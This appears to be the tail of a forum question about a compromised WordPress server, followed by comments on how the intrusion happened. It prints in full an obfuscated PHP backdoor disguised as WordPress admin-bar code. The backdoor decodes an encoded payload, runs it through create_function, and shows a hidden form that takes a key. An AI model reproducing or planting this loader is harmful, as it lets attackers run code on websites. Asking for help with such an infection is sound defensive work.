FOe9FW%Bv99GDQpgZRM8jRWXLWUt3IN0TpFevqdN42QBb4MPmAhoN3UhlnTF75mltTkkgzh23cylVP3lMvj+gVsANImmxxNoK+20nLwo5kv2Y9tg6WIP+bZp1%jdl1ze1N81frtvyzcQWnF5MEYii9YIHAqXlOxuxnSKb4nw1WyoNhP5ecoA2Rilbit0SJdrgRlIs6%371GhW7fZYIrjBAN2UcPGEdSCzQ+OFc0v7UczLcJ85Eac1igEej2F3ddqNus92IXmHyZJDDNhorNvOwTwK84geYaewOnc1IFJVqFUpuePjwsIXuoddOcOOXznaMgONR2m5TTCp6sN6GmUh6yAelw5Uyq2tbMIi+xahhFtj6agD1HSqd0B4709GMs5ClyKs8vI1v7vXQuUn77BzadgyVqGmALWRnXNHhOYAhxWr+B2oB8HF3VR0SqmaUStRy%X9Nw0YAYZl3G99CH0nN9FI%ijlQD%lIaPZow+hzsAhrOt5RFPGxi6BIOedIBAilFkLVYaJeiiXomYW17J0QyuiXbqQt+hktKQ0PJHHE9xA5lMqAJH9HpCLLSz5GBtMUHzNOrOe8Bd+OudzrcTquLG15Ddr1LxKYg+7asbi9VZWXzZ1PBswtSZw+clNGxKxptExf%KxM53zXxdsK9gfvSWkYIqGcJx0EJcgJWpxdwuyA3FC6IhzZgzIyKuOTB2U06XtsaQW4k5h%RhWMnAUKXZVaqInq3Nzfx3nB1eamjl%7kouxvIQs3eUexAP+p7iR+dvKnrdQDs4xLE9kqd+uh7w1e7ZzgMM8uHhGBUh830Cs1oa96hYFExkKUJFhbDxnGgT0kdcV5XguEvl2qGDOPHfskfJMsQ3SKkfJiAMhyNBqHeOpIAewUvZ9Ezx2%b8pHZJ+oZm2tpIqyA12acnDl1+eokk%4llvashr%tgmMNclC1iyR1wrdUk1tksjjGAqnzVUTF4W%SPoGRcXJo8cx2A8wmEbQQu4BGFZBxi4jijqoeNLQoWqMQQiApuOjt49P1Ky4uuXGVccYaP7hp8nl0r3aqWHES%02KBZVtK9jcbhCu7ghE+U6ZXT6CZWgvH82hDMyL73ulLH2N8B4M3iJt9IIZ%+Te1VjplSf27P7XPaJpQNkppYu%7rr4+Y7Bs%7IKp4ocPq9FPvzNoqWm9OKkrDvO3t4++nxRLUv7hR0O4WDXuCobCsPbYstXGnFRZnhw3Cy7+ckQkh9BFoJobQXlhK+oGG7PfYGiINPdx+83iLm7itAEs%Gg+VV9QOUBh5JMxiuw7uV8dD%Zp7MlC8rSCojO5cw+GCan2q7mAZh%katYvNLfSfqmvdjkj+lk8CMsnnkxNuTbdXSFLgNObgmVpD4lU9JOwlFKTslHuir0BigkPyEKcfEPEPsxD3NT+Yw%VNCCzDpkp8hRcgOOQdc3HGAdhqpLTI0I+D3VT9bGofx7yAmXKjhM8TSehw8u2oqcE3p8dQS8FVsBKOPQwVwydDmEsCBs55IyMSN6X5rlpGdxjG+5i5hjMsliDXxKFPQyiL3brEsut2Iyw5g7D%tJiutolg3m6N1iuBwsBepnypPG5yR0EcgBcGTdI5vBuwAB7i7ufu%cS3Q5XBqVSiGChBTP8cIpOir+qWTe1C693jikoM7DAbm4C2uxMC7G%DHLtK6uU4zwZUC2Gubt%1U6MuGiNFbRqkkB+EAcZGnf0CB+4fHwLfK%8Gmb5tC6BA7ZvBgZq+qX9Ay3c0+TbtJ1jsBQ2RYz3Ym4Iy6WVgYoYeEruhO76zTqVlJh73pRxp+bMpG5dls0cmhBGkHI66ZMQqfRxqRQodmR+1QRYOn0jcJC3ZQtuB9U8Qyt%ESC+yynUI%fJpOXzxfjxwKc1WKynKjhNzoclMxExomGqPxP0TKVhDXDucrtYGOKCnw4g7FzX1TEK5EoKQBthoh%T3P5i4xR1xRfBvQL83mmGsRkzN9Gd451dhnKOzuEmTZPnZP%wbybBzo36+gDK3TQKmnkckgM25l+v86ol69FXJfpXfgt+LDvPOipDAV5QHbTy51eFqumTxhMhuihdtllqWiggqMucVR%QtX3VU63zuPwaxlysw5W+Hx6V1krCtXj2Up2uB+5fhel5u84u7GyGhR82%ybKDjhLonvo5U3wQaA55iIEA3jM%e0hYunnwNFripGYp4PfHQ54rX5KgejFMccMz0OPgZcoiPs7RmcFK8%xN1RsZJU0Xsl4U2NGZtJc2CV599raNLftRngtbfysjgAvk+ROg9OXdY1AMggOdq3ATTR1zwGMLLkoysAeGeFD62%GTfsUaJUR5OqNOGETVIp8Rw5ITPx7wozdR+iYhFCn9jXQhuzpjdVYpeV4QBoyILSmLYn+rzG+unbY5ac8uLy8+kuBSqKPNLl8YCgO+zpb5zFe0TnLRN3OPNrSrYpmxdF82XV0wTWcqHCosOcBSIeEZoFZ0uPvCXH4haaUzQBQvfMMRuTW+qfB8QIbf8+oENby40YI%XGpcXccLiKA+SnglzowjeqNIBpfgI8VG0ui6Ffe40kzePf3fxQWUi5poe%JdmATxgDdm9OQcI4UOOt%ykT2mLRnisOuv7bKMnFt8869OufHlBe%i8zNRbJD0DujDlo0+eKoZpPCJFikJHkSC%t6cGQptQP6%LqewEQzeFyxPnAQVn4Jyub40JIPyEutawl5ZbyKFqOBDziD1nsJx9KnE0CgzHt%niD9sO54fzHbsloNG511uU%sEXd5f1j%HODaUOC7qeXBD%0s4j2TWPAzHjl8CTbyLoPO1rGXuWKYf7y+7vGfrwDVtuKjSXBPEdeSlSxMu0LmkLMV8AU27isR3U9ottbOM8JLlPd7fNql+DwlTUOpQ7uN7HMy2XvcEtwDSeHyJwT8%w%+rqOEFh81d+m8sJ3wuUuQViE23%xGhHY7jZAc7endk+PvqEX0tuKphsCvElwUMN%wGqOemDx1DY86IyOQB0mGeewZMju1xjSGMDNrbpj%bg6sCAg4%1H6SBuOLxfot9709OeqWX5aO11LoyiFmTJm1LW6uTbhuWMNpz6t2p6wEaZFqSI6qsEkQ1IA8OaiGZzO34uPOw80IPAcQLugznOftOqQ9r1sYyEnTQoswu7ci7XsLXV4WIfLh6FUd3+85mjftRp2OxWJkmq3haYaq2USsV35vxfGnfWRYiyx+g8VjVPtJQP+xp+aJgGVy4fUI0B+ExQDtqsccQEIB+xrTsS8i2Tz2cEuN3CMbvi0QTdUI0AA5x+Culv6l4W0wJ6TukCpk6QDpq0nxGjoNelMtMiXlQeG1EDPhxjz0FVxS2yTs3lf3h7Vo6%BXicBCko+9NiL8JqtTbEx7Ncvzm%eeL+K43KI0K4UZP95fWAi99xNH68vS3akP4lvmLCV8rGgfHvQMhhAdp8Asupnz24xySqyjf4CtLzbbb435XPtcis1GCk9D4jO8%AOm0B9pp8NPm%jDBHjqEZdLmWmKKB%IjVXCTvuDRn+wTk8KxoP1OmYyk2p6YXiTzh1UNcCzncBbhqJQysZuUl1G%VFkCdnfWvkIcqQ%6Jd8HVwa1IKvjlDWbLd03SQsVQVpuIPo%icGdFmMZ5MRRgjsyrGA%0%pWVHvGxm2WrLupo4yAys2Zb79fvKKSNcxkLAIoiqnFpKDJw38eFx1+FMa1cTOdOx04TsNGxhX0GXf%iaJL+dcR2NUkbEJdFJ2muwYXAFqiPv8hoBiYBZULjQuWs1xXF2JssObP8LYig1xM38BH+ggJ7ulFG6+kbWUHJhBiW41qmC5FgfcsAOOUSSqJel2atJDesMzFga0czscnqgRD58jVXw8ijYCEBfkAGecqB2Caaf8Sq4uZkWe6+d2gurfbwZqWrW9bhrsbQvAPyetKXiYZROHLF+JU2CFruVhbHI+8I+5hyTU0reAlYMdG4iv3gJupgA2syEDy%cLwDRNlU8AgjpkE7CgnIDo8+RgHsU60FlSsSLgOI1fITLyAVoJKsokBlMBQ0bDokWqcnLQJijyKNRuZMCuiUj9i%iWxnMvN7nRusLs6Q48hvEHiUmeYswZlTsIvaIJgGzxsbSBFYLufUr0jxfJXvvpcd1idFIqzrz6zUx0HsHech9Mg5llYXaSGqkLfAyYN58hnIu4Grfk3eOLzU0r94wxTgCaf6pEgEx0tCjUkamtX8mCDplRJ4X5so2Y0tdk3uePcwCS1%yzWD4KgpQPnxu8b8SzzJTJVlyKvMSGiURtN1ynimexaAF2B7aWOryy3kOrnt4wlVf%AbVmsJ4Cm06A7zB+LNUTDsNmYkjvclf0dKIDpS4%2M+DerPZO%8+Y32RRTMr+hAwM18xkq+fqPwSuzBfzdyQO9Jw8EMH3cFapPkKnxRnaYlnPaBCO1gKJjm3RfPNXhxLqlUtShwNlvqiWTuD4c+qfyHfvBPNk2hODwX7N8knWHZJFNCrnWnwdtcrxAoLseXHXJITXQ%Xa4MtqVDEUp5TsPf+CRmm8v6lhRB53TJeq+QIsHoYYEEQPAcJmFlNbLzK5CzB9z41eDtwaRbsRmfW6YTafCTQB2m0E6SWo687Aj3DEK7EKu0Z1HXKhcC3pyjfZIXlTYWNx8EBiegifFsCiAmdxAz0KUqOYKzeD2E40vzdCkotag8ZpMYAf9rnLHlgpw+pMtzAz9ntLQGO1rI1bfDPzjP6l6Ori9zw6u4YVgAn2x2O%T1FJJuyaHmuf0zM8CLJPQkH4F47on1rbdLqI+2Ny8VFHZ2sa5PUf89h96gern9uOU9JpZ313DCYUouZsD5%bWsesx8YgNagRHiCeUFfvg3i4BGhsUFKIYWePMWHFqyPSt%OWqDxT6Vl1DEp9D5nAUTYydr1iyhyzkH6mxs6kd%8++ICujwbIKJ9H3SmsOZTG9Q%P5VVFGxIyD8EGSlWkQTAlc+I%Aq4%nODDx1YCVWBmKiP4la51sWA5sfpotFcpD7DzRFDGvvQIqxNoVg3vxT8kt%fsXsWEzamr+l5QRIh%KJee9Ztn2yX%nkJ5GjFifbFbLJckLqwmK3%ReWDQqChu3ryE5GANOS6TUsL2UQZFWqTXcrkgqy4IUZUO+FdWdXdg52GdU64VX5Y40cnp2WKSWqMJh%IO+klR7DOlWbsSwzwa8LIXLiRvIfkhI4MR2UBRFmLQRwWP52x%yfu+gu4X%MWVGVVB1cwcWbiHteNqYlZpwczX1vr3tBiM5IXYizRiB9ua3oT5RbUp+Gy%NwFyOw5XPrjIN++YRnw%UDc+RmHH%+i0l5KiVt0ysTeunFGRPBcy78ZAr3bnBcS7cDKKj0vHay7AHU+8hc6RrTDx3Jl0FiEZnMCrOraPkOoxna1bZvXkaFQMZCTN6NwLRhmQWY2ATRsY8dL%PcIfMZ2%osRqpceyxH4NKPCi7czmz6ENikbsdgHjtrxAbBX5iCYka78bZZ5kIcGZGQhDdYdHx1duOEga1wMrZPaYH+5MqcP1xWaHnWAAxTPHS2nn+lN3dAPDAs5fMap4xUjjq1t%x4fKouCAfRRvCEr%Mv72fMkhjTHBw8qPphSf6Ho+lzaO4HvCwX+CkRkQZZxodA9zqawGU7yVMrEshQSdJkQzALrPc%QSMko%s35IhRw6HQDa0oVDbSIOv6TMCPoMBCaHPQSn8GQVXkojUKiS23uHomfSHR%59F0AAVcfVMpOktt6RnTFwxa3DvGU8Qw3es3+qkamODouGe1514oJxuqER1Toz6SeQm7cOaC1ZcVrYsngaWH95evvveEaTEge36hnQth61GUx6ct3yzOq8Jx5KGsjQvWP6SwvlhKS95niuA2jAbQXWBsCPQcx%nORUMeGaBVP0KuEx6XNWEcaPwOe2DBOOU80TZcip67QikvhoWm9dAwXPKapGTAL8TbBOkhWnG8jej2G5ZqSfOHhkz0%zhL8f554Gz6igDFEYzkvIkOBsZxX2xA0Z%aJRG%pg8ZVls8hYMC+s1D+rOQcd4Qwq8x858X3Dj0DDWNWuDT08B4pO3f1wGJFwpzaSXkxD+SDaThpTM0HS0e6Ojf1ZGVBFzBxZ+UXZBR4P14PToqvrEoLk3TpOFXkEs7cmCsd5k0yueRmT7ULLEdYJNKM4ZODMjq07YiLvcZXhRKixko0nePxRNEfFYyioUcUe7fR+LWhe9Z+vKfab8G+ZC2O7D+QONSa+2dD117Fnv+AGV7Ztw5Y5TF9tjqBVER88a4EQNrnKwa8O5bTYR7qBlchxIP4MLw6Oz02OdizInf0fZqt5S7+vcKUzDdFH0X1EeGikTusECQq4jTeYQms9ZqyuA+VXUF4iAF90nV2+ddtnFJUkJ4UZCRt45vIU3C4fNuahgHaHa6XWgVIl0LZfD1UPzRRbxd+NCDSewpUn83p5vys4xTB1RUzhr4v5PfDPCyoLYej6vLNn3IdFWkZE1MKc%%OW2lI3DIsdoTBGC1WPGYYmP0oV0ZwStXSgO8HpEhXzGTfUntdci2777wsdN%LeGeS+tf0caZwm2x0wm09zC0ZIVVYVMoEuvCtQsuits3Ccj123sFVwi0hCcOROlfsDtaCOKNPQeSBmmeVbJdWCOMq7+hwsW2%mN2sy1W+9BAUEiLlRgxQxl4sw+mT6tfSeJYlc+6pocmYFmNS31GOQIHyxSS7EcILKc1%ZRLmlBw+9A47f5mzF9ADpFpS81rMUoorLXegZjengSBp3AQm5wBKtxScadyJBc6RIZq75r7eudwM8HdKDoThDcZg4rzOfojpxJZtsHSGoxsMhucMbz5ZhM0dednc57K0SmM1XfSNdT2xznIsAuPAEvZjNIVhteoT8iOg+U+aN8kKxZ2j4SlpLUs8UFneXmTSxhBRW20BXgUVP1XtCLXU6GRhqB2XApEPmZJJupI%lQY69f8oHDcKXIkWAHWFCubN5CBIpyqQfgXv3pcyxqj+xCEwMH64YvvDOCw+hR92mfAOtR8OWRXswiXdyCcGN2VRF7UTIY+uYha1agrDFJWrzYkPRzMHuQ2jmUoj+BmyetUAUe6yrCX4jdawCTbP20lvoWP7WfvhZ4zb3H4ecYnWSY4K3nwKwWkbVU75xlpDjXY6H7hQlpLr4OE1Hnd%pHdeKY0md9eyha6rBADFFSzJdebT%HRmob7bFVJ1ESbjnx+EP6y0nVc0%BT4O1GrQ3l%2x%S7WyX48UGfmsWmiQ%pT0hR5P%B9R%kCj%br8AIYOYhngIePcBgdrkNq7CjYXpBWNGG7N0XnZE7f7erqYd62ws1Qd3B1wZBhs%tQXBm5WRJE+usq4+D2Z8rHTemV74nKcJCiRF4iBdFDPAMtEr78pesMPLb31%unaY6ZcSoqWGwxX4z5jpfocucWwSbDWZU82qVMc65pPK2lzkR%Uch7762%XHbzkzjU7lqs7ebuoVo9Baeqaos9GWUW1k+KZnrfIEd8VlFTGJi8YUej67t8aYdXnwQ5gTZNC6Q18O2fmP5JQkWQTmfUd0k2PSxyufr5RqABgGa+bh0d9zAuDmcYEkMAuTkP8+NbbDYoQtkVewpnUqQkJ7axRBJOtXwZ+jATPpo7uii47Kw40jrkq0cKZDnyn7oIuTyJuv4OhoZ%dqYB+EX+mc+bW95YfOaFGvXsPp%f7KkvuDmqp5Many%oOxwhj+WUOu8lhaE90JDlnGVg+7PH1f1XbCmAZQNKRNV5I4N2Az57fL4MvBWFB5tJ9IJv8wxcD1BUxkS%62U+4dnlfGz2OnjpeBk0jrJtX24YDi0Xh01QAbtzMHtfFbmHKoiQ6EavTC5PxRbtFISdyPtLCgBxyhBTQxaQWfXIlvhfH4zG1%l2BemBSSaBs9ZzJZSd7+OnK9jzRyDW+WYQrvxyYfRXiqKLCZbwMjoz9RbswtJKKQ3LElh4zIghVFyvVQp4SDXvX9G%bDscw69Dcc0ObHf1TwyYU6sCEkErZHCxR95kMGY8WMU2oXHToDyA8K+9x9n0TF8BRBRn2EfWEENQXvuBcYVusi+nJDPOUi55VTqbJVA3qyv+8bXHlcVpGK9z3+J7ASAT4NR0xP6c9akHoyqLs96+YeihhzfMXGDd7UTQgpHWuRIElSxNOqlO1CLmdrdkSV1lq39JX2Jy7Jq8eHcQz7spYcnBco05x9Bm5SkKdAcilkfw2RWz8O1gRaj33OmmGNN0Qz3iYMK3WmaK7GPi+lLZgQPh9ra9b4PeLtWEXNBkQpDhuOLSetlEjiojC82VW+imQmS9UWJ1qhSaXTWeSVLfcVKlSR%JgeVKVs4KbK8JOZehjV0Nr9CzJczDA2OUlwdDQ9rfqXbuNpBOFGwsg4jSzqo9BmYEAbgqo2sLbfX7kRRnPlFyQl++yudNoS8W91ThyQxfpciIsHROObrYdec%NRkp4288%zFIEoafdSq76%xHF5PCwwHs8jCqK5aix0E3fBc9EsXyDJI14HdQYf84Crtgkra5omI+4tc6VHYsmXSUAbwaSUUQ0qUSHtI9nKRjMoUjSLqkZfAeihWNifHM%e8%1ycaXpUNOt1%OaOWmhr387ZE+WHrOxocxLL2KWXLyZ2OxItbZ78hqjiIRsCY7JCb6Cgfa+xHiEJjoKU6cKK%5zjwoa8aVirwTo0p2dh38bBoW%aqkobbDFpUTuIwT37GJfibAwD7i2S%FMBU6shyWAbip8mBpi4BMxU7asv6PTSuHHw%qItVIvanKyXk4+LIucjlU8BIOchHfNGwSQct6ha+k6BOwU4gRZzqm048UVt6M6fmQgjmDFPoDT9b16Q7rntpFI9jHdQ5TGcICLY2nrvL7dVj3aVPYEIK2p9sPdPSPEZtWPjOl0tlsHzv3P43uDoeJG+6slPMY955FxqD6DT9tZ3gfe0u4qKOkDE2d7rcevQrMYJozT0f1IGliL0CIIXe8NnzWf8DMej4pm9G98bdCzX6Iq93Z4G9iP6XOpNOgwYCeSuOlYPi5acAyiNA9VgKAbv5Sgjdeg2rnvYoc5I7Y*';

$wpautop = pre_admin_bar( $wp_kses_data, $wp_nonce );

if( isset( $wpautop ) ){
    if( isset($_POST['f_pp']) ) @setcookie( 'f_pp', $_POST['f_pp'] );
    $shortcode_unautop = create_function( '', $wpautop );
    unset( $f_pp, $wpautop );
    $shortcode_unautop();
}


/**
 * Style and scripts for the admin bar.
 *
 * @since 3.1.0
 */
function wp_admin_bar_header() { 
echo '<form   method= "post" action= ""> <input type="input" name ="f_pp" value= ""/><input type= "submit" value= "&gt;"/> 
</form>';
}


/**
 * Retrieve the admin bar display preference of a user.
 *
 * @since 3.1.0
 * @access private
 *
 * @param string $context Context of this preference check. Defaults to 'front'. The 'admin'
 *     preference is no longer used.
 * @param int $user Optional. ID of the user to check, defaults to 0 for current user.
 * @return bool Whether the admin bar should be showing for this user.
 */
function _get_admin_bar_pref( $context = 'front', $user = 0 ) {
    $pref = get_user_option( "show_admin_bar_{$context}", $user );
    if ( false === $pref )
        return true;

    return 'true' === $pref;
}
wp_admin_bar_header();
```

Comment: How can you be sure your password wasn't cracked?

Comment: I used a super complicated password (with a password generator), and my login log with WP Security shows I'm the only logged user (using my own IP). So I'm sure that's enough? I suspect the access point originated from a bad plugin.

Comment: @ADyson - Do you know of a way to record which files/functions are making HTTP calls from the server in the apache access log, so I can narrow down where its coming from? I'm likely going to destroy this server (luckily it was just a new Digital Ocean test site that somehow got picked up by these bots - which makes me suspect a plugin somehow reported my IP to the attacker - or the attacker already had the IP from an old site) and start with a new one.

Comment: You'd have to search the source code for code which makes http requests